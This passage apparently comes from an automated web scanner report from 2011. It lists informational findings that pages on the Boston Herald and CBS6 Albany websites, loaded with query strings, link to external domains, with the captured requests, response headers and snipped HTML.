Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:42:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110128kate_hudson_on_baby_bump_it_feels_like_a_girl%2Fsrvc%3Dtrack%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Kate Hudson on baby bump: ‘It feels like a girl’');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312558&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(0) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/a2c141_kate_01282011.jpg" alt="Kate Hudson." /></div>
...[SNIP]...

<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.309. http://www.bostonherald.com/users/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/users/register

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/users/register?srvc=slider

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fusers%2Fregister.bg%3Fsrvc%3Dslider&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/users/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /users/register?srvc=slider HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:12 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

<link rel="alternate" title="Community - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/users/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fusers%2Fregister.bg%3Fsrvc%3Dslider&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
o activate your FREE account, submit the form below, then check your email inbox for instructions on how to confirm your account. (Note: We never share your information without your consent. See our <a href="http://www.heraldmedia.com/privacy.html">privacy policy</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.310. http://www.cbs6albany.com/common/archives/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/archives/

Issue detail

The page was loaded from a URL containing a query string:

http://www.cbs6albany.com/common/archives/?cat=Local+News

The response contains the following links to other domains:

http://albany.profootball.upickem.net/
http://an.tacoda.net/an/15135/slf.js
http://cbs6albany.oodle.com/
http://cbs6albany.oodle.com/housing/sale/
http://cbs6albany.oodle.com/service/
http://cbs6albany.oodle.com/vehicle/
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=Local+News&ghier=news%7Carchive&us=anonymous
http://common.onset.freedom.com/images/archive/camera.gif
http://common.onset.freedom.com/images/btn_search.gif
http://common.onset.freedom.com/images/searchBox_google_small.gif
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/fronts/SPORTS?SITE=WRGBTV&SECTION=SPORTS
http://mmod.ncaa.com/
http://pixel.quantserve.com/pixel/p-3dNEKaztYvrmc.gif
http://sixonseniors.freedomblogging.com/
http://spotlightnews.com/
http://twitter.com/CBS6_JerryG
http://twitter.com/CBS6albany
http://twitter.com/cbs6_lizb
http://weathernet6.wrgb.com/
http://www.berkshireeagle.com/
http://www.bryantstratton.edu/Locations/New-York/Albany.aspx
http://www.cbs.com/
http://www.cbs.com/info/hdtv/index.php
http://www.cwalbany.com/
http://www.dailygazette.com/
http://www.facebook.com/CBS6Greg
http://www.facebook.com/Steve.LaPointe.CBS6?ref=name
http://www.facebook.com/jerry.gretzinger.newsman?_fb_noscript=1
http://www.facebook.com/pages/Baptist-Health-Nursing-and-Rehabilitation-Center/167445690394
http://www.facebook.com/pages/WRGB-CBS-6-Albany/51577668476
http://www.facebook.com/profile.php?id=100000446238259
http://www.facebook.com/profile.php?id=1428716895&ref=profile
http://www.facebook.com/profile.php?id=855419171
http://www.freedom.com/
http://www.freedom.com/eula.html
http://www.freedom.com/privacy.html
http://www.lively-nation.com/healthy/wrgb/
http://www.twitter.com/cbs6_teresa

Request

GET /common/archives/?cat=Local+News HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:56 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:56 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 34134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=Local+News&ghier=news%7Carchive&us=anonymous"></script>
...[SNIP]...
<div style="padding-top:4px;padding-right:5px;float:right">
<a href="http://albany.profootball.upickem.net/"><img src="/images/pro_football.jpg" alt="" border="0" />
...[SNIP]...
<li><a href="http://weathernet6.wrgb.com/">Weathernet6</a>
...[SNIP]...
<li><a href="http://mmod.ncaa.com/" target="_blank">NCAA March Madness on Demand</a>
...[SNIP]...
<li><a href="http://hosted.ap.org/dynamic/fronts/SPORTS?SITE=WRGBTV&SECTION=SPORTS">National</a>
...[SNIP]...
<li><a href="http://twitter.com/CBS6albany" target="_blank">CBS 6 News Feed</a>
...[SNIP]...
<li><a href="http://twitter.com/cbs6_lizb" target="_blank">Liz's Feed</a>
...[SNIP]...
<li><a href="http://twitter.com/CBS6_JerryG" target="_blank">Jerry's Feed</a>
...[SNIP]...
<li><a href="http://www.twitter.com/cbs6_teresa" target="_blank">Teresa's Feed</a>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/WRGB-CBS-6-Albany/51577668476" target="_blank">CBS 6 Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=855419171">Liz...s Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/jerry.gretzinger.newsman?_fb_noscript=1" target="_blank">Jerry...s Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/Steve.LaPointe.CBS6?ref=name" target="_blank">Steve LaPointe...s Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/CBS6Greg">Greg's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=100000446238259">Teresa's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=1428716895&ref=profile" target="_blank">Marci's Facebook</a>
...[SNIP]...
<li><a href="http://www.cwalbany.com" target="_blank">Capital Region's CW</a>
...[SNIP]...
<li><a href="http://www.lively-nation.com/healthy/wrgb/">Healthy Living</a>
...[SNIP]...
<li><a href="http://sixonseniors.freedomblogging.com/">Six on Seniors Blog</a>
...[SNIP]...
<li><a href="http://www.bryantstratton.edu/Locations/New-York/Albany.aspx">Dream Career</a>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/Baptist-Health-Nursing-and-Rehabilitation-Center/167445690394">Baptist Health on Facebook</a>
...[SNIP]...
<li>
<a class="title" href="http://cbs6albany.oodle.com/">Classifieds</a>
...[SNIP]...
<li><a href="http://cbs6albany.oodle.com/vehicle/">Cars</a></li>
<li><a href="http://cbs6albany.oodle.com/housing/sale/">Real Estate</a>
...[SNIP]...
<li><a href="http://cbs6albany.oodle.com/service/">Services</a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/protesters-1282352-police-mubarak.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/schenectady-1282358-murder-reese.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/friday-1282318-councilmen-arraignment.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/pittsfield-1282351-overdue-property.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/water-1282349-releases-officials.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/policy-1282348-new-military.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/gunpoint-1282347-delivery-albany.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/amsterdam-1282346-stealing-home.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/arrested-1282345-old-year.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/district-1282344-central-lock.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/troy-1282343-firefighters-river.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/queensbury-1282342-public-assistance.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/teens-1282340-car-break.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/articles/obama-1282338-law-health.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/new-1282337-rail-connecticut.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/fair-1282336-positions-weekend.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/group-1282335-gunman-watervliet.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/gains-1282333-benefits-wages.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
<br /><img src="http://common.onset.freedom.com/images/searchBox_google_small.gif" width="47" height="14" alt="google" /></div>
...[SNIP]...
<a href="javascript:;" onclick="javascript:document.fisearch2.submit()"><img src="http://common.onset.freedom.com/images/btn_search.gif" border="0" alt="Search"></a>
...[SNIP]...
<li><a href="http://www.cbs.com/info/hdtv/index.php" onclick="window.open('http://www.cbs.com/info/hdtv/index.php');return false">CBS HDTV</a>
...[SNIP]...
<li><a href="http://www.cbs.com" onclick="window.open('http://www.cbs.com');return false">CBS.com</a>
...[SNIP]...
<li><a href="http://www.dailygazette.com" onclick="window.open('http://www.dailygazette.com');return false">Daily Gazette</a>
...[SNIP]...
<li><a href="http://www.berkshireeagle.com/" onclick="window.open('http://www.berkshireeagle.com');return false">Berkshire Eagle</a>
...[SNIP]...
<li><a href="http://spotlightnews.com/" target="_blank">Spotlight Newspapers</a>
...[SNIP]...
<p><a href="http://www.freedom.com/privacy.html" onclick="window.open('http://www.freedom.com/privacy.html');return false">Privacy Policy</a> | <a href="http://www.freedom.com/eula.html" onclick="window.open('http://www.freedom.com/eula.html');return false">User Agreement</a>
...[SNIP]...
<p><a href="http://www.freedom.com" target="_blank">Freedom Communications, Inc.</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-3dNEKaztYvrmc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

17.311. http://www.cbs6albany.com/common/archives/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/archives/

Issue detail

The page was loaded from a URL containing a query string:

http://www.cbs6albany.com/common/archives/?cat=Movie+Reviews&db=fbi&template=movie.html

The response contains the following links to other domains:

http://albany.profootball.upickem.net/
http://an.tacoda.net/an/15135/slf.js
http://cbs6albany.oodle.com/
http://cbs6albany.oodle.com/housing/sale/
http://cbs6albany.oodle.com/service/
http://cbs6albany.oodle.com/vehicle/
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=Education+Promo&ghier=news%7Carchive&us=anonymous
http://common.onset.freedom.com/images/archive/camera.gif
http://common.onset.freedom.com/images/btn_search.gif
http://common.onset.freedom.com/images/searchBox_google_small.gif
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/fronts/SPORTS?SITE=WRGBTV&SECTION=SPORTS
http://mmod.ncaa.com/
http://pixel.quantserve.com/pixel/p-3dNEKaztYvrmc.gif
http://sixonseniors.freedomblogging.com/
http://spotlightnews.com/
http://twitter.com/CBS6_JerryG
http://twitter.com/CBS6albany
http://twitter.com/cbs6_lizb
http://weathernet6.wrgb.com/
http://www.berkshireeagle.com/
http://www.bryantstratton.edu/Locations/New-York/Albany.aspx
http://www.cbs.com/
http://www.cbs.com/info/hdtv/index.php
http://www.cwalbany.com/
http://www.dailygazette.com/
http://www.facebook.com/CBS6Greg
http://www.facebook.com/Steve.LaPointe.CBS6?ref=name
http://www.facebook.com/jerry.gretzinger.newsman?_fb_noscript=1
http://www.facebook.com/pages/Baptist-Health-Nursing-and-Rehabilitation-Center/167445690394
http://www.facebook.com/pages/WRGB-CBS-6-Albany/51577668476
http://www.facebook.com/profile.php?id=100000446238259
http://www.facebook.com/profile.php?id=1428716895&ref=profile
http://www.facebook.com/profile.php?id=855419171
http://www.freedom.com/
http://www.freedom.com/eula.html
http://www.freedom.com/privacy.html
